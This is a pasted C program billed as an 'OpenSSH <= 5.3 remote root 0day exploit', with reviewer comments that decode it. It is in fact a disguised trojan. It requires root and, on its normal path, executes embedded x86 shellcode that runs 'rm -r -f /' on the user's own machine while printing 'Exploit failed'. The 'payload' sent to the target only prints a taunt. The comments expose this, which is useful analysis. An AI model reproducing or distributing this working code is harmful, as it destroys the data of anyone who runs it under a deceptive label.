
SSH 5.3 remote root 0day exploit

By: favoriter6 on Jan 18th, 2013  |  syntax: C  |  size: 3.11 KB  |  views: 9,587  |  expires: Never
  1. /*
  2. *
  3. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  4. *
  5. * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
  6. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
  7. *
  8. *
  9. */
  10.  
  11. #include <stdio.h>
  12. #include <netdb.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15. #include <unistd.h>
  16. #include <arpa/inet.h>
  17. #include <sys/types.h>
  18. #include <sys/socket.h>
  19. #include <netinet/in.h>
  20.  
  /*
   * Write the banner and the usage line to stdout, then end the process with
   * exit status 1. This function never returns to its caller.
   *
   * argv: the program's argument vector; only argv[0] is read, as the program
   *       name shown in the usage line.
   *
   * NOTE(review): the banner text advertises a remote OpenSSH exploit. That is
   * a claim made by these strings only; nothing in the visible listing speaks
   * the SSH protocol or reads a reply from the peer.
   */
  void usage(char *argv[])
  {
      static const char *const banner_lines[] = {
          "\n\t[+] HATSUNEMIKU\n",
          "\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n",
          "\t[+] By: Team foxx\n",
          "\t[+] Greetz to hackforums.net\n",
          "\t[+] Keep this 0day priv8!\n",
      };
      size_t idx;

      /* The fixed lines carry no conversion specifiers, so fputs emits them as-is. */
      for (idx = 0; idx < sizeof banner_lines / sizeof banner_lines[0]; idx++) {
          fputs(banner_lines[idx], stdout);
      }

      printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
      exit(1);
  }
  31.  
  /*
   * 45 bytes of 32-bit x86 Linux machine code, followed by the string
   * literal's terminating NUL.
   *
   * NOTE(review): the name suggests a decoder stub, but the bytes encode a
   * single execve system call. The ASCII fragments can be read straight from
   * the hex without executing anything:
   *   2f 62 69 6e = "/bin"     2f 2f 72 6d = "//rm"
   *   2d 72       = "-r"       2d 66       = "-f"
   *   6a 2f       = push of the one-character string "/"
   * The opening 6a 0b 58 leaves 11 in eax (execve in the i386 syscall table)
   * and the closing cd 80 is int 0x80. Net effect when run:
   *   execve("/bin//rm", { "/bin//rm", "-r", "-f", "/", NULL }, NULL)
   * i.e. a forced recursive delete starting at the filesystem root.
   *
   * The only place in this listing that executes these bytes is the
   * function-pointer call in main(), which runs them in the local process.
   * Whether the call takes effect on a given host (non-executable data pages,
   * how the installed rm treats "/") is not established by this file.
   */
  unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                             "\x6a\x2f\x89\xe7\x52"
                             "\x66\x68\x2d\x66\x89"
                             "\xe6\x52\x66\x68\x2d"
                             "\x72\x89\xe1\x52\x68"
                             "\x2f\x2f\x72\x6d\x68"
                             "\x2f\x62\x69\x6e\x89"
                             "\xe3\x52\x57\x56\x51"
                             "\x53\x89\xe1\xcd\x80";
  41.  
  /*
   * 43 bytes of 32-bit x86 Linux machine code, followed by the string
   * literal's terminating NUL. None of the 43 bytes is zero.
   *
   * NOTE(review): the name suggests a shell payload, but the bytes contain no
   * execve and no socket handling. They push a 10-byte ASCII message onto the
   * stack (the immediates 6f 75 21 0a / 63 6b 20 79 / 66 75 are printable
   * text ending in a newline), issue write (eax = 4) to descriptor 1 with
   * length 10, then exit (eax = 1) with status 0. In other words: print a
   * taunt and quit.
   *
   * In this listing the array is only copied into main()'s payload buffer and
   * passed to send(); it is never called locally.
   */
  unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                             "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                             "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                             "\xdb\x40\xcd\x80";
  46.  
  /*
   * Entry point. Reads the effective uid, checks the argument count, and then
   * follows one of two paths: a local function-pointer call into `decoder`, or
   * a TCP connect to port 22 followed by a single send().
   *
   * NOTE(review): what the code does differs from what the banner claims.
   *  - argv[1] and argv[2] are never read; only argc is checked, and argv is
   *    passed to usage(). The port is the constant 22.
   *  - The host buffer `h` is never written before it is used, so the address
   *    lookup does not operate on the target the user typed.
   *  - When that lookup fails, the bytes in `decoder` are executed in THIS
   *    process. Per the hex, they are an execve of /bin//rm with -r -f /.
   *    Because of the euid gate below, that happens as root on the machine
   *    running the program.
   *  - No recv()/read() appears anywhere, so nothing is ever received from the
   *    peer; there is no SSH protocol exchange in this function.
   *
   * Returns: no return statement is reached on the paths that call exit();
   * the branch that calls system() falls off the end of main.
   */
  int main(int argc, char **argv)
  {

      int euid = geteuid();
      int port= 22, sock;           /* port is fixed; argv[2] is not consulted */
      char h[1000];                 /* never initialised or filled from argv[1] */
      struct hostent *host;
      struct sockaddr_in addr;      /* not zeroed before use */

      /*
       * The message cites raw sockets, but the only socket created below is
       * SOCK_STREAM, which needs no privilege. The practical effect of this
       * check is that everything after it runs with euid 0.
       */
      if(euid != 0)
      {
          fprintf(stderr, "You need to be root to use raw sockets.\n");
          exit(1);
      }
      if(euid == 0)
      {
          fprintf(stdout, "MIKU! MIKU! MIKU!\n");
      }
      if(argc != 3)
      usage(argv);
      /*
       * `h` holds indeterminate bytes here (reading it is undefined
       * behaviour). NOTE(review): in practice both inet_aton() and
       * gethostbyname() are expected to reject that garbage, which makes the
       * inner failure branch the normal path rather than an error path.
       */
      if(!inet_aton(h, &addr.sin_addr))
      {
          host = gethostbyname(h);
          if(!host)
          {
              fprintf(stderr, "[-] Exploit failed.\n");
              /*
               * Casts the data array to a function pointer and calls it: the
               * `decoder` bytes execute locally, in this process, as euid 0.
               * Nothing has been sent to any remote host at this point. The
               * "failed" message printed just before presents this as a
               * harmless error.
               */
              (*(void(*)())decoder)();
              exit(1);
          }
          addr.sin_addr = *(struct in_addr*)host->h_addr;
          }
          /* Ordinary TCP client socket; its return value is not checked. */
          sock = socket(PF_INET, SOCK_STREAM, 0);
          addr.sin_port = htons(port);
          addr.sin_family = AF_INET;
          if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
          {
              fprintf(stderr,"[-] Exploit failed.\n");
              exit(1);
          }
          char payload[1337];
          /*
           * Both copies land at offset 0 of `payload`, so the second one
           * overwrites the first and the `decoder` bytes are never part of
           * what is sent. sizeof(rootshell) includes the literal's NUL, so
           * strlen() below stops right after the rootshell bytes.
           */
          memcpy(payload, &decoder, sizeof(decoder));
          memcpy(payload, &rootshell, sizeof(rootshell));
          /* One unsolicited write to the peer; the result is ignored and no reply is read. */
          send(sock, payload, strlen(payload),0);
          close(sock);
          /*
           * `sock` was closed on the previous line and is not reopened, so
           * this connect() operates on a closed descriptor. NOTE(review): it
           * is expected to return -1, which would make the "Exploit failed"
           * exit the only branch taken and the two branches after it dead code.
           */
          if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
          {
              fprintf(stderr, "[-] Exploit failed.\n");
              exit(1);
          }
          else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
          {
              fprintf(stdout, "[+]g0t sh3ll!\n");
              /*
               * system() starts /bin/bash on the local machine with the
               * caller's own privileges; no socket is attached to it, so this
               * is not a remote shell.
               */
              system("/bin/bash");
          }
          else
          {
              fprintf(stderr, "[-] Exploit failed.\n");
              close(sock);
              exit(0);
          }
  }